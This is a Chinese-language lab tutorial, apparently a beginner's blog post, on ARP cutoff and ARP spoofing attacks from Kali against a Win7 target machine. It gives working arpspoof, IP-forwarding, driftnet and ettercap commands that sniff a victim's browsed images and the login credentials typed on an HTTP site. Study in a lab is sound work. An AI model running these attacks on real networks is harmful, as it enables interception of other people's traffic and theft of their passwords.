- ARP断网:目标ip的流量经过我的网卡
- ARP欺骗:目标ip的流量经过我的网卡,再从网关出去。
实验环境
- kali(攻击机)
- win7(靶机)
实验步骤
1.查看win7(靶机)的ip地址、网关和mac地址
ipconfig /all
2.查看ARP缓存表中的网关MAC地址
arp -a
3.查看kali(攻击机)的mac地址
ifconfig
4.扫描主机,查看活跃(alive)的主机,以确定要攻击的Ip地址
fping –s –r 1 -g 192.168.171.0/24
-s 选项表示显示最终结果,-r 选项设置尝试次数,-g 选项设置扫描范围
5.arpspoof断网攻击
arpspoof -i eth0 -t 192.168.171.128 192.168.171.2
命令格式:arpspoof -i 网卡 -t 目标ip 网关
-i 后面的参数是网卡名称
-t 后面的参数是目的主机和网关,截获目的主机发往网关的数据包
受到断网攻击的win7系统无法ping通百度
6.查看win7(靶机)网关的mac地址攻击前后的变化:
攻击前(win7):
攻击前(kali):
攻击后(win7):
可以看到,win7(靶机)的mac地址替换成kali的mac地址了,也无法访问互联网了。
7.攻击利用:内网截获图片
- /proc/sys/net/ipv4/ip_forward=0 为不转发
- 修改/proc/sys/net/ipv4/ip_forward 的值使其等于1,开启流量转发,并查看
echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
8.在kali攻击机中利用driftnet工具 ,捕获win7靶机浏览的图片
检查安装driftnet工具:
apt-get install driftnet
使用eth0网卡启动driftnet工具:driftnet -i eth0
出现红框中的警告不用管,不影响我们正常使用 !!!
9.在win7靶机中访问一个http网页
我们拿超星学习通来举例,网址http://mooc1.chaoxing.com/
在kali中成功捕获到win7浏览页面的图片
10.使用ettercap 工具抓取流量数据
启动图形化界面 ettercap -G
选好网卡之后我们去扫描这个网段下面的主机,点击红框中的勾
点击1图标,没有靶机ip和网关就点击2图标多扫描几次
分别把win7的ip和网关加入target1和target2中
选择ARP POISONING
按照上图选择并点击ok即可
11.在win7中访问一个http网页
本次实验使用网址http://v3.chaoxing.com
在kali中可以看到靶机中输入的账号和密码
刚入坑网安,欢迎一起讨论交流~